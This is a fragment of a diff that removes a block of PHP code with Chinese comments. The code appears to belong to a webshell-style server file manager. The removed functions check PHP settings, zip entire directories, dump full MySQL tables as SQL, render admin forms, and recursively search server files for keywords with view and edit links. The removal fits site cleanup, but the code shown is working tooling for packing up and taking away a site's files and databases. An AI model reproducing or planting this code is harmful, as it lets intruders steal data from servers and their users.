$relativepath_info[$i]; - } //end for - return implode('/', $mainpath_info); - } - - // 检查PHP配置参数 - function getphpcfg($varname) { - switch($result = get_cfg_var($varname)) { - case 0: - return "No"; - break; - case 1: - return "Yes"; - break; - default: - return $result; - break; - } - } - - // 检查函数情况 - function getfun($funName) { - return (false !== function_exists($funName)) ? "Yes" : "No"; - } - - // 压缩打包类 - class PHPZip{ - var $out=''; - function PHPZip($dir) { - if (@function_exists('gzcompress')) { - $curdir = getcwd(); - if (is_array($dir)) $filelist = $dir; - else{ - $filelist=$this -> GetFileList($dir);//文件列表 - foreach($filelist as $k=>$v) $filelist[]=substr($v,strlen($dir)+1); - } - if ((!empty($dir))&&(!is_array($dir))&&(file_exists($dir))) chdir($dir); - else chdir($curdir); - if (count($filelist)>0){ - foreach($filelist as $filename){ - if (is_file($filename)){ - $fd = fopen ($filename, "r"); - $content = @fread ($fd, filesize ($filename)); - fclose ($fd); - if (is_array($dir)) $filename = basename($filename); - $this -> addFile($content, $filename); - } - } - $this->out = $this -> file(); - chdir($curdir); - } - return 1; - } - else return 0; - } - - // 获得指定目录文件列表 - function GetFileList($dir){ - static $a; - if (is_dir($dir)) { - if ($dh = opendir($dir)) { - while (($file = readdir($dh)) !== false) { - if($file!='.' && $file!='..'){ - $f=$dir .'/'. $file; - if(is_dir($f)) $this->GetFileList($f); - $a[]=$f; - } - } - closedir($dh); - } - } - return $a; - } - - var $datasec = array(); - var $ctrl_dir = array(); - var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; - var $old_offset = 0; - - function unix2DosTime($unixtime = 0) { - $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime); - if ($timearray['year'] < 1980) { - $timearray['year'] = 1980; - $timearray['mon'] = 1; - $timearray['mday'] = 1; - $timearray['hours'] = 0; - $timearray['minutes'] = 0; - $timearray['seconds'] = 0; - } // end if - return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | - ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); - } - - function addFile($data, $name, $time = 0) { - $name = str_replace('\\', '/', $name); - - $dtime = dechex($this->unix2DosTime($time)); - $hexdtime = '\x' . $dtime[6] . $dtime[7] - . '\x' . $dtime[4] . $dtime[5] - . '\x' . $dtime[2] . $dtime[3] - . '\x' . $dtime[0] . $dtime[1]; - eval('$hexdtime = "' . $hexdtime . '";'); - $fr = "\x50\x4b\x03\x04"; - $fr .= "\x14\x00"; - $fr .= "\x00\x00"; - $fr .= "\x08\x00"; - $fr .= $hexdtime; - - $unc_len = strlen($data); - $crc = crc32($data); - $zdata = gzcompress($data); - $c_len = strlen($zdata); - $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); - $fr .= pack('V', $crc); - $fr .= pack('V', $c_len); - $fr .= pack('V', $unc_len); - $fr .= pack('v', strlen($name)); - $fr .= pack('v', 0); - $fr .= $name; - - $fr .= $zdata; - - $fr .= pack('V', $crc); - $fr .= pack('V', $c_len); - $fr .= pack('V', $unc_len); - - $this -> datasec[] = $fr; - $new_offset = strlen(implode('', $this->datasec)); - - $cdrec = "\x50\x4b\x01\x02"; - $cdrec .= "\x00\x00"; - $cdrec .= "\x14\x00"; - $cdrec .= "\x00\x00"; - $cdrec .= "\x08\x00"; - $cdrec .= $hexdtime; - $cdrec .= pack('V', $crc); - $cdrec .= pack('V', $c_len); - $cdrec .= pack('V', $unc_len); - $cdrec .= pack('v', strlen($name) ); - $cdrec .= pack('v', 0 ); - $cdrec .= pack('v', 0 ); - $cdrec .= pack('v', 0 ); - $cdrec .= pack('v', 0 ); - $cdrec .= pack('V', 32 ); - $cdrec .= pack('V', $this -> old_offset ); - $this -> old_offset = $new_offset; - $cdrec .= $name; - - $this -> ctrl_dir[] = $cdrec; - } - - function file() { - $data = implode('', $this -> datasec); - $ctrldir = implode('', $this -> ctrl_dir); - return - $data . - $ctrldir . - $this -> eof_ctrl_dir . - pack('v', sizeof($this -> ctrl_dir)) . - pack('v', sizeof($this -> ctrl_dir)) . - pack('V', strlen($ctrldir)) . - pack('V', strlen($data)) . - "\x00\x00"; - } - } - - // 备份数据库 - function sqldumptable($table, $fp=0) { - $tabledump = "DROP TABLE IF EXISTS $table;\n"; - $tabledump .= "CREATE TABLE $table (\n"; - - $firstfield=1; - - $fields = mysql_query("SHOW FIELDS FROM $table"); - while ($field = mysql_fetch_array($fields)) { - if (!$firstfield) { - $tabledump .= ",\n"; - } else { - $firstfield=0; - } - $tabledump .= " $field[Field] $field[Type]"; - if (!empty($field["Default"])) { - $tabledump .= " DEFAULT '$field[Default]'"; - } - if ($field['Null'] != "YES") { - $tabledump .= " NOT NULL"; - } - if ($field['Extra'] != "") { - $tabledump .= " $field[Extra]"; - } - } - mysql_free_result($fields); - - $keys = mysql_query("SHOW KEYS FROM $table"); - while ($key = mysql_fetch_array($keys)) { - $kname=$key['Key_name']; - if ($kname != "PRIMARY" and $key['Non_unique'] == 0) { - $kname="UNIQUE|$kname"; - } - if(!is_array($index[$kname])) { - $index[$kname] = array(); - } - $index[$kname][] = $key['Column_name']; - } - mysql_free_result($keys); - - while(list($kname, $columns) = @each($index)) { - $tabledump .= ",\n"; - $colnames=implode($columns,","); - - if ($kname == "PRIMARY") { - $tabledump .= " PRIMARY KEY ($colnames)"; - } else { - if (substr($kname,0,6) == "UNIQUE") { - $kname=substr($kname,7); - } - $tabledump .= " KEY $kname ($colnames)"; - } - } - - $tabledump .= "\n);\n\n"; - if ($fp) { - fwrite($fp,$tabledump); - } else { - echo $tabledump; - } - - $rows = mysql_query("SELECT * FROM $table"); - $numfields = mysql_num_fields($rows); - while ($row = mysql_fetch_array($rows)) { - $tabledump = "INSERT INTO $table VALUES("; - - $fieldcounter=-1; - $firstfield=1; - while (++$fieldcounter<$numfields) { - if (!$firstfield) { - $tabledump.=", "; - } else { - $firstfield=0; - } - - if (!isset($row[$fieldcounter])) { - $tabledump .= "NULL"; - } else { - $tabledump .= "'".mysql_escape_string($row[$fieldcounter])."'"; - } - } - - $tabledump .= ");\n"; - - if ($fp) { - fwrite($fp,$tabledump); - } else { - echo $tabledump; - } - } - mysql_free_result($rows); - } - - class FORMS { - function tableheader() { - echo "\n"; - } - - function headerform($arg=array()) { - global $dir; - if ($arg[enctype]){ - $enctype="enctype=\"$arg[enctype]\""; - } else { - $enctype=""; - } - if (!isset($arg[method])) { - $arg[method] = "POST"; - } - if (!isset($arg[action])) { - $arg[action] = ''; - } - echo " \n"; - echo " \n"; - echo " \n"; - echo " \n"; - echo " \n"; - } - - function tdheader($title) { - global $dir; - echo " \n"; - echo " \n"; - echo " \n"; - } - - function tdbody($content,$align='center',$bgcolor='2',$height='',$extra='',$colspan='') { - if ($bgcolor=='2') { - $css="secondalt"; - } elseif ($bgcolor=='1') { - $css="firstalt"; - } else { - $css=$bgcolor; - } - $height = empty($height) ? "" : " height=".$height; - $colspan = empty($colspan) ? "" : " colspan=".$colspan; - echo " \n"; - echo " \n"; - echo " \n"; - } - - function tablefooter() { - echo "
".$arg[content]."
".$title." [返回]
".$content."
\n"; - } - - function formheader($action='',$title,$target='') { - global $dir; - $target = empty($target) ? "" : " target=\"".$target."\""; - echo "
\n"; - echo " \n"; - echo " ".$title." [返回]\n"; - echo " \n"; - } - - function makehidden($name,$value=''){ - echo "\n"; - } - - function makeinput($name,$value='',$extra='',$type='text',$size='30',$css='input'){ - $css = ($css == 'input') ? " class=\"input\"" : ""; - $input = "\n"; - return $input; - } - - function maketextarea($name,$content='',$cols='100',$rows='20',$extra=''){ - $textarea = "\n"; - return $textarea; - } - - function formfooter($over='',$height=''){ - $height = empty($height) ? "" : " height=\"".$height."\""; - echo " \n"; - echo " \n"; - echo " \n"; - echo "
\n"; - echo $end = empty($over) ? "" : "\n"; - } - - function makeselect($arg = array()){ - if ($arg[multiple]==1) { - $multiple = " multiple"; - if ($arg[size]>0) { - $size = "size=$arg[size]"; - } - } - if ($arg[css]==0) { - $css = "class=\"input\""; - } - $select = "\n"; - return $select; - } - } - - function find($path) //查找关键词 -{ - global $oldkey,$type,$type2,$endline,$beline; - if(is_dir("$path")){ - $tempdir=opendir("$path"); - while($f=readdir($tempdir)){ if($f=="."||$f=="..")continue; find("$path/$f");} - closedir($tempdir); - }else{ - if(filesize("$path")){ - $fp=fopen("$path","r"); - $msg=fread($fp, filesize("$path")); - fclose($fp); -if(strpos($msg, $oldkey) !== false) { - $dir = dirname($path); - $file = basename($path); -if($type=="list"){ - $mymsg = explode("\n",$msg); - $long = count($mymsg); - $tmp = explode($oldkey,$msg); - $tmp = explode("\n",$tmp[0]); - $first = count($tmp); - $end = "[".$first."/".$long."]"; -} -if($type2=="getpath"){ - $get = explode($oldkey,$msg); - $get = strlen($get[0]); - if(isset($beline)){ - $get = $get-$beline; - } - $getpath = htmlspecialchars(substr($msg, $get, $endline)); - $getpath = "title = \"".$getpath."\""; -} -echo "找到:$dir/$file |view+edit | $end
"; -} - } - } -} -?> \ No newline at end of file